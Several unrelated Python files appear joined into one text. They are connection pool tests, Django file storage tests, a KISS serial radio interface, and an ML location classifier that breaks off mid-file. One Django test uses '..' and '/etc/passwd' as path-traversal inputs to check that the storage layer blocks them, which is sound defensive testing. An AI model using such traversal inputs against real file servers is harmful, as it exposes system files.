c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c3)
pc2 = p.connect()
is_(pc2.connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c1)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert dbapi.connect().special_rollback.called
assert not dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 1)
eq_(dbapi.connect().special_commit.call_count, 0)
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert not dbapi.connect().special_rollback.called
assert dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 0)
eq_(dbapi.connect().special_commit.call_count, 1)
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_reset_agent_disconnect(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
p._invalidate(self.conn)
raise Exception("hi")
def commit(self):
self.conn.commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
# no warning raised. We know it would warn due to
# QueuePoolTest.test_no_double_checkin
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
tests.py | # -*- coding: utf-8 -*-
import os
import shutil
import sys
import tempfile
import time
from cStringIO import StringIO
from datetime import datetime, timedelta
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.images import get_image_dimensions
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import UploadedFile
from django.core.exceptions import ImproperlyConfigured
from django.utils import unittest
try:
import threading
except ImportError:
import dummy_threading as threading
# Try to import PIL in either of the two ways it can end up installed.
# Checking for the existence of Image is enough for CPython, but
# for PyPy, you need to check for the underlying modules
try:
from PIL import Image, _imaging
except ImportError:
try:
import Image, _imaging
except ImportError:
Image = None
class GetStorageClassTests(unittest.TestCase):
def assertRaisesErrorWithMessage(self, error, message, callable,
*args, **kwargs):
self.assertRaises(error, callable, *args, **kwargs)
try:
callable(*args, **kwargs)
except error, e:
self.assertEqual(message, str(e))
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
self.assertRaisesErrorWithMessage(
ImproperlyConfigured,
"NonExistingStorage isn't a storage module.",
get_storage_class,
'NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
self.assertRaisesErrorWithMessage(
ImproperlyConfigured,
'Storage module "django.core.files.storage" does not define a '\
'"NonExistingStorage" class.',
get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
self.assertRaisesErrorWithMessage(
ImproperlyConfigured,
'Error importing storage module django.core.files.non_existing_'\
'storage: "No module named non_existing_storage"',
get_storage_class,
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mktemp()
os.makedirs(self.temp_dir)
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.failIf(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assert_(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.failIf(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assert_(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
def test_file_with_mixin(self):
"""
File storage can get a mixin to extend the functionality of the
returned file.
"""
self.failIf(self.storage.exists('test.file'))
class TestFileMixin(object):
mixed_in = True
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assert_(isinstance(
self.storage.open('test.file', mixin=TestFileMixin),
TestFileMixin
))
self.storage.delete('test.file')
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.failIf(self.storage.exists('storage_test_1'))
self.failIf(self.storage.exists('storage_test_2'))
self.failIf(self.storage.exists('storage_dir_1'))
f = self.storage.save('storage_test_1', ContentFile('custom content'))
f = self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set([u'storage_dir_1']))
self.assertEqual(set(files),
set([u'storage_test_1', u'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class UnicodeFileNameTests(unittest.TestCase):
def test_unicode_file_names(self):
"""
Regression test for #8156: files with unicode names I can't quite figure
out the encoding situation between doctest and this file, but the actual
repr doesn't matter; it just shouldn't return a unicode object.
"""
uf = UploadedFile(name=u'ยฟCรณmo?',content_type='text')
self.assertEqual(type(uf.__repr__()), str)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile("Data"))
def test_race_condition(self):
self.thread.start()
name = self.save_file('conflict')
self.thread.join()
self.assert_(self.storage.exists('conflict'))
self.assert_(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.old_perms = settings.FILE_UPLOAD_PERMISSIONS
settings.FILE_UPLOAD_PERMISSIONS = 0666
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
settings.FILE_UPLOAD_PERMISSIONS = self.old_perms
shutil.rmtree(self.storage_dir)
def test_file_upload_permissions(self):
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0777
self.assertEqual(actual_mode, 0666)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.failIf(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
# Before 2.6, a leading dot was treated as an extension, and so
# underscore gets added to beginning instead of end.
if sys.version_info < (2, 6):
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/_1.test')))
else:
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class DimensionClosingBug(unittest.TestCase):
"""
Test that get_image_dimensions() properly closes files (#8817)
"""
@unittest.skipUnless(Image, "PIL not installed")
def test_not_closing_of_files(self):
"""
Open files passed into get_image_dimensions() should stay opened.
"""
empty_io = StringIO()
try:
get_image_dimensions(empty_io)
finally:
self.assert_(not empty_io.closed)
@unittest.skipUnless(Image, "PIL not installed")
def test_closing_of_filenames(self):
"""
get_image_dimensions() called with a filename should closed the file.
"""
# We need to inject a modified open() builtin into the images module
# that checks if the file was closed properly if the function is
# called with a filename instead of an file object.
# get_image_dimensions will call our catching_open instead of the
# regular builtin one.
class FileWrapper(object):
_closed = []
def __init__(self, f):
self.f = f
def __getattr__(self, name):
return getattr(self.f, name)
def close(self):
self._closed.append(True)
self.f.close()
def catching_open(*args):
return FileWrapper(open(*args))
from django.core.files import images
images.open = catching_open
try:
get_image_dimensions(os.path.join(os.path.dirname(__file__), "test1.png"))
finally:
del images.open
self.assert_(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
"""
Test that get_image_dimensions() works properly after various calls
using a file handler (#11158)
"""
@unittest.skipUnless(Image, "PIL not installed")
def test_multiple_calls(self):
"""
Multiple calls of get_image_dimensions() should return the same size.
"""
from django.core.files.images import ImageFile
img_path = os.path.join(os.path.dirname(__file__), "test.png")
image = ImageFile(open(img_path, 'rb'))
image_pil = Image.open(img_path)
size_1, size_2 = get_image_dimensions(image), get_image_dimensions(image)
self.assertEqual(image_pil.size, size_1)
self.assertEqual(size_1, size_2)
|
KISSInterface.py | from .Interface import Interface
from time import sleep
import sys
import serial
import threading
import time
import RNS
class KISS():
FEND = 0xC0
FESC = 0xDB
TFEND = 0xDC
TFESC = 0xDD
CMD_UNKNOWN = 0xFE
CMD_DATA = 0x00
CMD_TXDELAY = 0x01
CMD_P = 0x02
CMD_SLOTTIME = 0x03
CMD_TXTAIL = 0x04
CMD_FULLDUPLEX = 0x05
CMD_SETHARDWARE = 0x06
CMD_READY = 0x0F
CMD_RETURN = 0xFF
@staticmethod
def escape(data):
data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc]))
return data
class KISSInterface(Interface):
MAX_CHUNK = 32768
owner = None
port = None
speed = None
databits = None
parity = None
stopbits = None
serial = None
def __init__(self, owner, name, port, speed, databits, parity, stopbits, preamble, txtail, persistence, slottime, flow_control, beacon_interval, beacon_data):
if beacon_data == None:
beacon_data = ""
self.serial = None
self.owner = owner
self.name = name
self.port = port
self.speed = speed
self.databits = databits
self.parity = serial.PARITY_NONE
self.stopbits = stopbits
self.timeout = 100
self.online = False
self.beacon_i = beacon_interval
self.beacon_d = beacon_data.encode("utf-8")
self.first_tx = None
self.packet_queue = []
self.flow_control = flow_control
self.interface_ready = False
self.flow_control_timeout = 5
self.flow_control_locked = time.time()
self.preamble = preamble if preamble != None else 350;
self.txtail = txtail if txtail != None else 20;
self.persistence = persistence if persistence != None else 64;
self.slottime = slottime if slottime != None else 20;
if parity.lower() == "e" or parity.lower() == "even":
self.parity = serial.PARITY_EVEN
if parity.lower() == "o" or parity.lower() == "odd":
self.parity = serial.PARITY_ODD
try:
RNS.log("Opening serial port "+self.port+"...")
self.serial = serial.Serial(
port = self.port,
baudrate = self.speed,
bytesize = self.databits,
parity = self.parity,
stopbits = self.stopbits,
xonxoff = False,
rtscts = False,
timeout = 0,
inter_byte_timeout = None,
write_timeout = None,
dsrdtr = False,
)
except Exception as e:
RNS.log("Could not open serial port "+self.port, RNS.LOG_ERROR)
raise e
if self.serial.is_open:
# Allow time for interface to initialise before config
sleep(2.0)
thread = threading.Thread(target=self.readLoop)
thread.setDaemon(True)
thread.start()
self.online = True
RNS.log("Serial port "+self.port+" is now open")
RNS.log("Configuring KISS interface parameters...")
self.setPreamble(self.preamble)
self.setTxTail(self.txtail)
self.setPersistence(self.persistence)
self.setSlotTime(self.slottime)
self.setFlowControl(self.flow_control)
self.interface_ready = True
RNS.log("KISS interface configured")
else:
raise IOError("Could not open serial port")
def setPreamble(self, preamble):
preamble_ms = preamble
preamble = int(preamble_ms / 10)
if preamble < 0:
preamble = 0
if preamble > 255:
preamble = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXDELAY])+bytes([preamble])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface preamble to "+str(preamble_ms)+" (command value "+str(preamble)+")")
def setTxTail(self, txtail):
txtail_ms = txtail
txtail = int(txtail_ms / 10)
if txtail < 0:
txtail = 0
if txtail > 255:
txtail = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXTAIL])+bytes([txtail])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface TX tail to "+str(txtail_ms)+" (command value "+str(txtail)+")")
def setPersistence(self, persistence):
if persistence < 0:
persistence = 0
if persistence > 255:
persistence = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_P])+bytes([persistence])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface persistence to "+str(persistence))
def setSlotTime(self, slottime):
slottime_ms = slottime
slottime = int(slottime_ms / 10)
if slottime < 0:
slottime = 0
if slottime > 255:
slottime = 255
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SLOTTIME])+bytes([slottime])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("Could not configure KISS interface slot time to "+str(slottime_ms)+" (command value "+str(slottime)+")")
def setFlowControl(self, flow_control):
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_READY])+bytes([0x01])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
if (flow_control):
raise IOError("Could not enable KISS interface flow control")
else:
raise IOError("Could not enable KISS interface flow control")
def processIncoming(self, data):
self.owner.inbound(data, self)
def processOutgoing(self,data):
if self.online:
if self.interface_ready:
if self.flow_control:
self.interface_ready = False
self.flow_control_locked = time.time()
data = data.replace(bytes([0xdb]), bytes([0xdb])+bytes([0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb])+bytes([0xdc]))
frame = bytes([KISS.FEND])+bytes([0x00])+data+bytes([KISS.FEND])
written = self.serial.write(frame)
if data == self.beacon_d:
self.first_tx = None
else:
if self.first_tx == None:
self.first_tx = time.time()
if written != len(frame):
raise IOError("Serial interface only wrote "+str(written)+" bytes of "+str(len(data)))
else:
self.queue(data)
def queue(self, data):
self.packet_queue.append(data)
def process_queue(self):
if len(self.packet_queue) > 0:
data = self.packet_queue.pop(0)
self.interface_ready = True
self.processOutgoing(data)
elif len(self.packet_queue) == 0:
self.interface_ready = True
def readLoop(self):
try:
in_frame = False
escape = False
command = KISS.CMD_UNKNOWN
data_buffer = b""
last_read_ms = int(time.time()*1000)
while self.serial.is_open:
if self.serial.in_waiting:
byte = ord(self.serial.read(1))
last_read_ms = int(time.time()*1000)
if (in_frame and byte == KISS.FEND and command == KISS.CMD_DATA):
in_frame = False
self.processIncoming(data_buffer)
elif (byte == KISS.FEND):
in_frame = True
command = KISS.CMD_UNKNOWN
data_buffer = b""
elif (in_frame and len(data_buffer) < RNS.Reticulum.MTU):
if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN):
# We only support one HDLC port for now, so
# strip off the port nibble
byte = byte & 0x0F
command = byte
elif (command == KISS.CMD_DATA):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
data_buffer = data_buffer+bytes([byte])
elif (command == KISS.CMD_READY):
self.process_queue()
else:
time_since_last = int(time.time()*1000) - last_read_ms
if len(data_buffer) > 0 and time_since_last > self.timeout:
data_buffer = b""
in_frame = False
command = KISS.CMD_UNKNOWN
escape = False
sleep(0.05)
if self.flow_control:
if not self.interface_ready:
if time.time() > self.flow_control_locked + self.flow_control_timeout:
RNS.log("Interface "+str(self)+" is unlocking flow control due to time-out. This should not happen. Your hardware might have missed a flow-control READY command, or maybe it does not support flow-control.", RNS.LOG_WARNING)
self.process_queue()
if self.beacon_i != None and self.beacon_d != None:
if self.first_tx != None:
if time.time() > self.first_tx + self.beacon_i:
RNS.log("Interface "+str(self)+" is transmitting beacon data: "+str(self.beacon_d.decode("utf-8")), RNS.LOG_DEBUG)
self.first_tx = None
self.processOutgoing(self.beacon_d)
except Exception as e:
self.online = False
RNS.log("A serial port error occurred, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("The interface "+str(self.name)+" is now offline. Restart Reticulum to attempt reconnection.", RNS.LOG_ERROR)
def __str__(self):
return "KISSInterface["+self.name+"]" |
learn.py | #!/usr/bin/python3
import json
import csv
from random import shuffle
import warnings
import pickle
import gzip
import operator
import time
import logging
import math
from threading import Thread
import functools
import multiprocessing
# create logger with 'spam_application'
logger = logging.getLogger('learn')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('learn.log')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - [%(name)s/%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
import numpy
from sklearn.feature_extraction import DictVectorizer
from sklearn.pipeline import make_pipeline
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn import cluster, mixture
from sklearn.neighbors import kneighbors_graph
from naive_bayes import ExtendedNaiveBayes
from naive_bayes2 import ExtendedNaiveBayes2
def timeout(timeout):
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
res = [Exception('function [%s] timeout [%s seconds] exceeded!' % (
func.__name__, timeout))]
def newFunc():
try:
res[0] = func(*args, **kwargs)
except Exception as e:
res[0] = e
t = Thread(target=newFunc)
t.daemon = True
try:
t.start()
t.join(timeout)
except Exception as je:
raise je
ret = res[0]
if isinstance(ret, BaseException):
raise ret
return ret
return wrapper
return deco
class AI(object):
def __init__(self, family, path_to_data):
self.logger = logging.getLogger('learn.AI')
self.naming = {'from': {}, 'to': {}}
self.family = family
self.path_to_data = path_to_data
def classify(self, sensor_data):
header = self.header[1:]
is_unknown = True
csv_data = numpy.zeros(len(header))
for sensorType in sensor_data['s']:
for sensor in sensor_data['s'][sensorType]:
sensorName = sensorType + "-" + sensor
if sensorName in header:
is_unknown = False
csv_data[header.index(sensorName)] = sensor_data[
's'][sensorType][sensor]
self.headerClassify = header
self.csv_dataClassify = csv_data.reshape(1, -1)
payload = {'location_names': self.naming['to'], 'predictions': []}
threads = [None]*len(self.algorithms)
self.results = [None]*len(self.algorithms)
for i, alg in enumerate(self.algorithms.keys()):
threads[i] = Thread(target=self.do_classification, args=(i, alg))
threads[i].start()
for i, _ in enumerate(self.algorithms.keys()):
threads[i].join()
for result in self.results:
if result != None:
payload['predictions'].append(result)
payload['is_unknown'] = is_unknown
return payload
def do_classification(self, index, name):
"""
header = ['wifi-a', 'wifi-b']
csv_data = [-67 0]
"""
if name == 'Gaussian Process':
return
t = time.time()
try:
prediction = self.algorithms[
name].predict_proba(self.csv_dataClassify)
except Exception as e:
logger.error(self.csv_dataClassify)
logger.error(str(e))
return
predict = {}
for i, pred in enumerate(prediction[0]):
predict[i] = pred
predict_payload = {'name': name,
'locations': [], 'probabilities': []}
badValue = False
for tup in sorted(predict.items(), key=operator.itemgetter(1), reverse=True):
predict_payload['locations'].append(str(tup[0]))
predict_payload['probabilities'].append(
round(float(tup[1]), 2))
if math.isnan(tup[1]):
badValue = True
break
if badValue:
return
# try:
# t2 = time.time()
# name = "Extended Naive Bayes"
# clf = ExtendedNaiveBayes(self.family,path_to_data=self.path_to_data)
# predictions = clf.predict_proba(header,csv_data)
# predict_payload = {'name': name,'locations': [], 'probabilities': []}
# for tup in predictions:
# predict_payload['locations'].append(str(self.naming['from'][tup[0]]))
# predict_payload['probabilities'].append(round(tup[1],2))
# payload['predictions'].append(predict_payload)
# self.logger.debug("{} {:d} ms".format(name,int(1000 * (t2 - time.time()))))
# except Exception as e:
# self.logger.error(str(e))
# try:
# t2 = time.time()
# name = "Extended Naive Bayes2"
# clf = ExtendedNaiveBayes2(self.family, path_to_data=self.path_to_data)
# predictions = clf.predict_proba(header, csv_data)
